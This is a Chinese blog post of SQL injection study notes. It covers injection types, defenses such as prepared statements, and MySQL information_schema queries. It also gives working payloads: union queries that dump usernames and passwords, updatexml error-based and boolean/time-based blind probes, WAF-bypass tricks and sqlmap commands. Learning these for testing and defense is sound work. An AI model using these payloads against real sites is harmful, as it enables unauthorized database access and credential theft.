sql注入

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量197 收藏
点赞数 1
分类专栏: 渗透测试从入门到入土 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73896875/article/details/132120535
版权

简介

sql注入产生的主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。

分类

1.基于数字或字符串型注入(分为联合查询注入,堆叠查询注入,宽字节注入)

2.基于报错注入(页面会返回报错信息)

3.基于布尔的盲注(根据返回页面判断条件真假)

4.基于时间的盲注(查看延迟语句是否执行)

防御

1.使用预编译语句,绑定变量(预编译语句是在执行 SQL 查询之前,将 SQL 查询字符串和用户输入分开处理的一种技术。通常,预编译语句会将 SQL 查询字符串中的变量位置用占位符(例如问号 ? 或者冒号 :)代替。然后,将用户输入作为参数传递给预编译的语句,而不是直接将用户输入嵌入到 SQL 查询字符串中。)

2.过滤特殊符号 如','',and,or等

3.检查变量的数据类型和格式

4.使用白名单来规范化输入验证方法

information_schema库(mysql5.0以上才有本数据库)

information_schema.schemata:记录所有数据库名信息的表,数据库名的列在本表中是schema_name

information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_schema:数据库名

table_name:表名

column_name:列名

information_schema库常用查询payload

1.获取数据库名

SELECT SCHEMA_NAME FROM information_schema.SCHEMATA(获取所有数据库的名称)

2.获取表名

SELECT TABLE_NAME FROM information_schema.TABLES(获取所有表的名称)

3.获取字段名

SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME = 'users' AND TABLE_SCHEMA = 'securty';
(查询securty数据库下uesers表下的所有列名)

常用sql注入payload

2从information数据库下的columns表内查询users表的列

select group_concat(column_name) from information_schema.columns where  table_name='users'

3查询security库下的users表内的username

select group_concat(username) from security.users

4查询security库下的users表内的password

select group_concat(password) from security.users

5报错查询数据库

and updatexml(1,concat(0x7e,database(),0x7e),1)

5报错查询表名

and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where  table_schema='security'),0x7e),1)

6布尔注入查询数据库长度

?id=1 and length(database()) = 8--+

7布尔注入查询数据库字段

?id=1 and substr(database(),1,1)='s' --+

8时间盲注

?id=1 and if(length(database())=4,sleep(5),2)

绕过WAF

1.变换大小写

2.编码:16进制编码,unicode编码

3.插入注释符

4.重写

5.二阶注入

6.宽字节注入

sql注入流程

1.找到注入点

2.判断请求类型(如get,post,http head)

3.判断页面有无回显,确定是否盲注,或者报错注入

4.有回显的情况下判断是字符型还是数字型

5.测试闭合

6.构建payload

7.无回显的情况下查看是否有报错信息,有报错信息使用报错注入,没有则使用盲注。

sqlmap注入方法

1.如果是get方法,直接sqlmap -u "网址"

2.post方法,使用sqlmap -u "网址" --data="post的参数"

3.如果是cookie,X-Forwarded-For等,可以在访问的时候用burpsuite抓包,注入处用*cookie*或*xforwardedfor*替代,放到文件中,然后sqlmap -r "文件地址"

报错注入函数

1.updatexml()函数

2.extractvalue()函数

3.floor()函数

盲注和延时注入(时间盲注)的共同点?

都是一个字符一个字符的判断

宽字节注入

宽字节注入主要是源于程序员设置数据库编码与PHP编码设置为不同的两个编码格式从而导致产生宽字节注入

EternalStarCity
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
m0_67392811的博客
06-12 5799
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入详解
Lamb的博客
08-02 787
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库
SQL注入
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
SQL注入简介和注入方法教学
HAKUNAMATATATTA的博客
11-14 5014
sqli-labs靶场为例,详细介绍GET显错注入,GET盲注等一系列最新常见得SQL注入方法
SQL注入详解(万字文章详解)
追光者的博客
03-12 7981
本文章仅为学习交流使用,请勿做其它用途使用,请勿触碰法律红线。
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 4930
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入总结
qq_46081990的博客
04-22 3957
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
SQL注入基础
屿的博客
02-14 4438
各位靓仔们是否经常听到sql注入呢,那么什么是sql注入?引用微软官方的语言来说:SQL 注入是一种攻击方式,在这种攻击方式中,在字符串中插入恶意代码,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。构成 SQL 语句的任何过程都应进行注入漏洞审阅,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。那么接下来,让我们来了解一下sql注入是如何产生的。
sql注入sql注入
最新发布
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值